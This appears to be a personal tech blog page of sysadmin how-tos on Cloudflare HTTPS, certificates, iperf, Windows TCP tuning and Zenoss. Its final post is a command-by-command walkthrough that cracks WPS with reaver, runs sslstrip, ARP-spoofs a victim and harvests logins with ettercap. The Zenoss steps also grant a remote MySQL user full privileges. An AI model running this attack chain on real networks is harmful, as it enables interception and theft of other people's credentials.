Howto: Configure Cloudflare for WordPress

My web hosting company doesn’t support SSL certificates for subdomains. And because Google’s Chrome will, from July, flag every website without HTTPS as not secure, I had a deadline to move my blog to HTTPS. Cloudflare is a nice reverse proxy solution and its basic plan is free to use as well.

So what I did was create a Cloudflare account and put my website behind it. After that I forced HTTPS and voilà, my website was served over HTTPS. These are the steps you must take:

Note: this trick also works if you want to use Cloudflare as a reverse proxy to mitigate DDoS attacks, improve your site’s security, hide your hosting backend and make your website a lot faster. If you run a Raspberry Pi at home, for example, you can put Cloudflare between the visitor and your home IP and save yourself a lot of trouble.

  • If you use the Wordfence plugin, make sure your PHP version is higher than 5.6, otherwise you get errors and conflicts (more info)
  • Go to Cloudflare and create an account
  • Configure your DNS

  • Temporarily disable DNSSEC at your domain if it is enabled (Cloudflare cannot take over your DNS otherwise). In my case I had to open a ticket with my domain registrar
  • Cloudflare gives you 2 new name servers. Change them at your domain registrar, or ask the registrar to change them if you cannot do it yourself

  • After a successful nameserver change, Cloudflare shows in the portal that everything is OK:

  • Optimize Cloudflare for WordPress in the Cloudflare WordPress plugin and enable automatic HTTPS rewrites

  • Now edit your site URL under Settings > General in WordPress

  • And finally go to Cloudflare and enable “Always Use HTTPS” under Crypto

Now everything is done and your website is fully HTTPS at the frontend (with automatic HTTP > HTTPS redirects). Because my backend doesn’t have an SSL certificate, all the data between Cloudflare and my hosting company is still sent unencrypted. So this is a nasty workaround, but you won’t have any trouble with Chrome’s HTTPS warnings in the near future.

Create a strong self-signed certificate for multiple years

If you follow these steps you can create a self-signed certificate with the following specifications:

  • Wildcard certificate
  • SHA256 hash
  • 10 years
  • 2048 bits public key
  • Client and server verification
  • SHA1 fingerprint

Be aware that a self-signed certificate can be impersonated by a man-in-the-middle, since no trusted CA vouches for it. Do not use this in critical production environments.

Use Windows 10 PowerShell in admin mode, otherwise you will get errors.

# Windows 10 defaults give RSA 2048, SHA256 and the Server/Client Authentication EKUs.
# Validity starts 15 days in the past (tolerates clock differences) and 3560 days is roughly 10 years.
New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname *.domain.local -NotBefore $([datetime]::now.AddDays(-15)) -NotAfter $([datetime]::now.AddDays(3560))

Now export the certificate. Before you copy/paste, replace the thumbprint below with the thumbprint you got from the command above.

# The PFX password protects the exported private key; use a real one instead of "YourPassword".
$CertPassword = ConvertTo-SecureString -String "YourPassword" -Force -AsPlainText
# PFX = certificate plus private key, for IIS
Export-PfxCertificate -Cert cert:\LocalMachine\My\C6B46CEB7D3A40DB08E78B19FEDD3A24EA7A7919 -FilePath C:\test.pfx -Password $CertPassword
# CER = public certificate only, for the trusted root store of the clients
Export-Certificate -Cert Cert:\LocalMachine\My\C6B46CEB7D3A40DB08E78B19FEDD3A24EA7A7919 -FilePath C:\tstcert.cer

Now you can import the PFX in IIS and bind the certificate to your site.
Then import the *.CER via MMC > Certificates > Computer account > Trusted Root Certification Authorities > Certificates

Have fun with your certificate the next 10 years 😀


Inspiration

Convert PFX to PEM and upload the certificate to Plesk

Export the Private Key:

# openssl pkcs12 -in filename.pfx -nocerts -out key.pem

Remove the password from the private key (Plesk needs an unencrypted key):

# openssl rsa -in key.pem -out server.key

Export the certificate:

# openssl pkcs12 -in filename.pfx -clcerts -nokeys -out cert.pem
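The three openssl steps above as one function, plus the check a practitioner wants before uploading: does server.key really belong to cert.pem? This is an added example, not from the post or from Plesk; it also applies to the PFX exported with Export-PfxCertificate in the previous post. It assumes openssl on PATH and uses constructed argument names ($1 = PFX file, $2 = PFX password, $3 = output directory).

```shell
# Convert a PFX to the PEM pair Plesk expects and prove key and certificate match.
pfx_to_pem() {
    pfx="$1"; pass="$2"; out="${3:-.}"
    # 1. private key, still passphrase-protected (a PFX from old Windows may need "-legacy" on OpenSSL 3)
    openssl pkcs12 -in "$pfx" -nocerts -passin "pass:$pass" -passout "pass:$pass" -out "$out/key.pem" || return 1
    # 2. strip the passphrase for Plesk; create the file owner-only, since it is now plaintext
    (umask 077; openssl rsa -in "$out/key.pem" -passin "pass:$pass" -out "$out/server.key") || return 1
    # 3. the leaf certificate only: no key, no chain
    openssl pkcs12 -in "$pfx" -clcerts -nokeys -passin "pass:$pass" -out "$out/cert.pem" || return 1
}

# An RSA key and certificate belong together when their modulus is identical.
# Returns 0 on a match, 1 on a mismatch or an unreadable key (a copy/paste slip in the
# hosting panel typically shows up as a "key does not match certificate" error).
key_matches_cert() {
    k=$(openssl rsa -noout -modulus -in "$1" 2>/dev/null)
    c=$(openssl x509 -noout -modulus -in "$2" 2>/dev/null)
    case "$k" in Modulus=*) ;; *) return 1 ;; esac
    [ "$k" = "$c" ]
}
```

Usage: `pfx_to_pem filename.pfx 'pfx-password' /tmp/out && key_matches_cert /tmp/out/server.key /tmp/out/cert.pem`.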

Now upload the certificate:


And bind the certificate in your hosting settings:


Find your fastest DNS server

There is a nice cross-platform open source tool to find out what the best DNS server is for your internet connection.

  1. Go to https://code.google.com/p/namebench/downloads/list
  2. Download the namebench tool
  3. Extract and start the tool
  4. Click on “Start Benchmark”


This benchmark takes some time, about 15 minutes. Then you get the results in your browser:


201% faster name query performance!!! WOW!

When everything is set up you can check your DNS settings with a nice website: https://www.dnsleaktest.com/


To find the best DNS server for you, run the tool at different times of the day. Keep in mind that the fastest resolver is not automatically the one to trust: whoever runs it sees every name you look up.

Happy resolving 🙂

Build your own speedtest with iperf

When you have network performance issues you often use speed test websites to check the network bandwidth. But most of the time you want to measure the bandwidth between two specific servers. There is a cross-platform speed test utility you can use for that. The name of the tool is iperf.

How it works:

  • Download the tool: http://iperf.fr/
  • Extract the tool to a folder and go to that folder on the command line
  • Start the tool on the server with this command: iperf -s


  • Start the tool on the remote client: iperf -c IPSERVER -r
  • The tool first tests an upload from the client to the server and then a download from the server to the client


If you have connection problems with iperf, try temporarily turning off the firewall on both server and client, or only open the port iperf listens on (TCP 5001 by default for iperf 2). You can also experiment with different TCP window sizes: iperf -c IPSERVER -r -w 40000
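Because the post wants to monitor the bandwidth between two specific servers rather than eyeball it once, here is an added example (not from the post or the iperf project) that turns iperf’s machine-readable output into a check. Run `iperf -c IPSERVER -r -y C` and pipe the output in; the field layout assumed for iperf 2’s CSV is timestamp,local_ip,local_port,remote_ip,remote_port,id,interval,bytes,bits_per_second, and the sample lines are constructed, not real measurements.

```shell
# Summarise iperf 2 CSV output and flag any run below a bandwidth floor.
# $1 = floor in Mbit/s. Prints one line per run (with -r: client->server first, then
# server->client) and returns 1 when at least one run is below the floor.
iperf_check() {
    awk -F, -v floor="$1" '
        NF >= 9 {
            mbps = $9 / 1000000                      # field 9 is bits per second
            slow = (mbps + 0 < floor + 0)
            if (slow) bad = 1
            printf "%s -> %s  %s s  %.1f Mbit/s %s\n", $2, $4, $7, mbps, (slow ? "BELOW FLOOR" : "ok")
        }
        END { exit (bad ? 1 : 0) }'
}

# Constructed sample of two runs from "iperf -c 192.168.1.20 -r -y C":
# about 94 Mbit/s client->server, about 47 Mbit/s server->client.
SAMPLE_IPERF_CSV='20150819234010,192.168.1.10,54321,192.168.1.20,5001,3,0.0-10.0,117440512,93952410
20150819234020,192.168.1.10,5001,192.168.1.20,40123,4,0.0-10.0,58720256,46976205'
```

Usage: `printf '%s\n' "$SAMPLE_IPERF_CSV" | iperf_check 50` prints both runs and exits 1 because the return direction is under 50 Mbit/s, which is what a cron job or monitoring check can act on.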

For a lot of tips and tricks (even a graphical interface called jperf) check: http://openmaniak.com/iperf.php

Happy troubleshooting 😀

Windows 2012 R2 unstable internet connection

I had two HP DL380 G6 servers with Windows 2012 R2 that had the same problem. When I started a download (I tried a lot of different sites) the download speed dropped and fluctuated. When I connected my laptop or another server to the same cable the download was stable. So my conclusion was that the onboard NIC was the problem.

What I tried:

  • Updated to the latest HP SSP (2014_2)
  • Updated the NIC firmware
  • Updated the NIC driver
  • Updated Windows (patches)
  • Changed the default NIC settings, for example disabling TCP offload
  • Tried another switch

Bandwidth during download:


I thought the problem must be the NIC, so I added an Intel Pro NIC to the server, with the same result 🙁

Then I found the command netsh interface tcp show global.

Output:

C:\Windows\system32>netsh interface tcp show global
Querying active state...

TCP Global Parameters
----------------------------------------------
Receive-Side Scaling State          : enabled
Chimney Offload State               : disabled
NetDMA State                        : disabled
Direct Cache Access (DCA)           : disabled
Receive Window Auto-Tuning Level    : enabled
Add-On Congestion Control Provider  : none
ECN Capability                      : enabled
RFC 1323 Timestamps                 : disabled
Initial RTO                         : 3000
Receive Segment Coalescing State    : enabled
Non Sack Rtt Resiliency             : disabled
Max SYN Retransmissions             : 2

I dug into these settings and noticed “Receive Window Auto-Tuning Level: enabled”. So I disabled that setting with:

netsh int tcp set global autotuninglevel=disabled

After that setting the network connection to the internet was stable 🙂


I found an article explaining that Cisco PIX IOS 8.0 doesn’t support “TCP Window Scaling”. Source: http://www.cisco.com/c/en/us/support/docs/security/ios-firewall/71613-iosfw-tcp-scaling-ts.html

So I used the workaround of disabling automatic window scaling in Windows, because I can’t update our old PIX.

Problem solved 😀

Zenoss: Performance issues with too many events

When you have too many events in your Zenoss environment, the Zenoss web interface becomes very sloooooooow and you get all kinds of errors:

  • Script doesn’t respond
  • Connection refused. Check zeneventserver status on daemons
  • A Zenoss error has occurred

When you run top you see a lot of java processes as soon as you click the Infrastructure button in Zenoss. Java sometimes takes 350% CPU:

java -Djetty.host=localhost -server -XX:+HeapDumpOnOutOfMemoryError -DZENOSS_COMMAND=zeneventserver -DZENHOME=/opt/zenoss -Djetty.home=/opt/zenoss -Djetty.logs=/opt/zenoss/log -Dlogback.configurationFile=/opt/zenoss/etc/zeneventserver/logback.xml -Xmx1024m -DZENOSS_DAEMON=y -jar /opt/zenoss/lib/jetty-start-7.5.3.v20111011.jar --config=/opt/zenoss/etc/zeneventserver/jetty/start.config --ini=/opt/zenoss/etc/zeneventserver/jetty/jetty.ini --pre=etc/zeneventserver/jetty/jetty-logging.xml

I’ve read a lot of Zenoss documentation on the internet but didn’t find a nice article on how to get rid of all the events. So here is how I fixed it.

Basic steps:

  1. Backup Zenoss
  2. Stop zenoss
  3. Create a new zeneventserver database
  4. Remove zeneventserver content
  5. Restore the zenoss backup
  6. Start zenoss
  7. Enjoy your fast zenoss 🙂

Detailed steps:

  • ssh to the Zenoss host
  • Switch to the zenoss user (as a login shell, so its PATH and $ZENHOME are set)

# su - zenoss

  • Create backup:

$ /opt/zenoss/bin/zenbackup -v10

  • Stop Zenoss service

$ zenoss stop

  • Edit the zeneventserver script

nano /opt/zenoss/bin/zeneventserver-create-db

  • Search for root and fill in the root password


  • Run the script

$ zeneventserver-create-db --force --dbtype=mysql

  • Clear the zeneventserver folder

rm -rf $ZENHOME/var/zeneventserver/*

Now the tricky part. Zenoss changes some MySQL passwords when you do a restore. This results in “access denied for user zenoss@localhost” during the restore. There is a fix for this: reset the ‘zenoss’@’localhost’ and ‘zenoss’@’%’ MySQL passwords before you do the restore.

First get the current MySQL password from the global.conf file (highlighted in yellow in the screenshot). This is the password you need for the restore.

$nano /opt/zenoss/etc/global.conf


Tip: to check the (hashed) password, run the following. You can do the same after you change the password:

$ mysql -uroot -p
mysql> select * from mysql.user;


Now reset the password:

SET PASSWORD FOR 'zenoss'@'localhost' = PASSWORD('BEagPxxxxxxxxxxxxxxx');
SET PASSWORD FOR 'zenoss'@'%' = PASSWORD('BEagPxxxxxxxxxxxxxxx');
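The reset above only works when the password you type matches global.conf exactly. This added example (not Zenoss’s own tooling) reads the credentials out of global.conf and prints the two SET PASSWORD statements for you to pipe into `mysql -uroot -p`. It assumes global.conf uses the “key value” layout with zodb-user and zodb-password lines, which is an assumption about the file; the sample fragment below is constructed with a placeholder password.

```shell
# Print the SET PASSWORD statements for 'zenoss'@'localhost' and 'zenoss'@'%' using the
# password found in $1 (global.conf). Returns 1 if the user or password line is missing.
zenoss_reset_sql() {
    conf="$1"
    user=$(awk '$1 == "zodb-user" { print $2 }' "$conf")
    pass=$(awk '$1 == "zodb-password" { print $2 }' "$conf")
    if [ -z "$user" ] || [ -z "$pass" ]; then
        echo "zodb-user / zodb-password not found in $conf" >&2
        return 1
    fi
    # a single quote inside the password would break the SQL string literal, so double it
    esc=$(printf '%s' "$pass" | sed "s/'/''/g")
    for host in localhost '%'; do
        printf "SET PASSWORD FOR '%s'@'%s' = PASSWORD('%s');\n" "$user" "$host" "$esc"
    done
}

# Constructed global.conf fragment (placeholder password, not a real one).
SAMPLE_GLOBAL_CONF=$(mktemp)
cat > "$SAMPLE_GLOBAL_CONF" <<'EOF'
zodb-db-type mysql
zodb-host localhost
zodb-db zodb
zodb-user zenoss
zodb-password BEagPxxxxxxxxxxxxxxx
zep-user zenoss
zep-password BEagPxxxxxxxxxxxxxxx
EOF
```

Usage on the real host: `zenoss_reset_sql /opt/zenoss/etc/global.conf | mysql -uroot -p`.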

When you check again you see a different hash:

$ mysql -uroot -p
mysql> select * from mysql.user;

(I don’t have an image example because this is an production enviroment)

Optional: to check the zenoss user’s permissions:

mysql> SELECT user, host, db, select_priv, insert_priv, grant_priv FROM mysql.db;


Optional: if you still get errors or the rights above aren’t correct, create the user for both hosts with these MySQL statements (use the password from global.conf instead of some_pass):

mysql> CREATE USER 'zenoss'@'localhost' IDENTIFIED BY 'some_pass';
mysql> GRANT ALL PRIVILEGES ON *.* TO 'zenoss'@'localhost'
    -> WITH GRANT OPTION;

mysql> CREATE USER 'zenoss'@'%' IDENTIFIED BY 'some_pass';
mysql> GRANT ALL PRIVILEGES ON *.* TO 'zenoss'@'%'
    -> WITH GRANT OPTION;

OK, now everything is set, do the restore. The -v flag stands for verbose, and with --no-eventsdb you don’t restore the events. That’s exactly what we want.

zenrestore --file=/opt/zenoss/backups/zenbackup_2014013 -v --no-eventsdb

Now start zenoss

$zenoss start

That’s it. Enjoy the performance, and tune some parameters so that your events don’t grow that big again in the future.

Source: http://www.nickyeates.com/technology/zenoss/useful_commands_zenoss4
Source: http://community.zenoss.org/docs/DOC-3048

My Raspberry Pi Project: Hack box

Finally I found a nice project for my Raspberry Pi 🙂 I’ll write down some notes in this post to make it easier to find these Linux commands again. Please use this documentation only as a white hat hacker and for learning purposes only!!!!

First:

To break into a WPS-compatible wireless access point:

  • airmon-ng start wlan0
  • wireless-overview
  • reaver -i mon0 -b 64:27:37:50:02:77 -c 5 -vv
  • After +/- 10 hours you have the PSK

Now configure the wireless interface with your credentials

  • airmon-ng stop wlan0
  • nano /etc/network/interfaces
  • Original file:
auto lo

iface lo inet loopback
iface eth0 inet dhcp

allow-hotplug wlan0
iface wlan0 inet manual
wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp
  • New file:
auto lo

iface lo inet loopback
iface eth0 inet dhcp
iface wlan0 inet dhcp
wpa-ssid "L0g0ff"
wpa-psk "SomePassword"
allow-hotplug wlan0
iface wlan0 inet dhcp
#wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp
  • Now bring up the wireless card: ifup wlan0

Now that the wireless setup is done, we make our Pi an IP forwarding server, so that we can do man-in-the-middle attacks.

  • nano /proc/sys/net/ipv4/ip_forward change the 0 to 1
  • iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666 

    (needed to forward all HTTP traffic to SSLStrip)

  • sslstrip -l 666 (do not close this terminal)

Now that the proxy is running we want to ARP spoof, so that we can redirect all traffic to our Pi

  • arpspoof -i wlan0 -t 192.168.1.12 192.168.1.1 (where 1.12 is our victim and 1.1 our gateway) (do not close this terminal)
  • You can also spoof the entire network with arpspoof -i wlan0 192.168.1.1, but if your PI cannot handle all traffic you will DoS your network.

And now all things are set the sniffing can begin 🙂

  • ettercap -m ettercap.log -Tq -i wlan0 (don’t close the terminal)

The only thing left now is to wait until the victim logs in to a website; the username and password will be written to the ettercap.log file. With the command cat ettercap.log | grep USER you can see all the login credentials.

What did we learn?

  1. Never login to a website without https
  2. Never login to a website with https errors
  3. Always disable WPS on your router
  4. On company wireless sites always use a DMZ

Sources:
http://www.ikwashetniet.blogspot.nl/2012/01/wps-van-handig-hulpmiddel-naar-gapend.html
http://www.hackavision.com/2011/07/sniffing-passwords-over-wifi-connection.html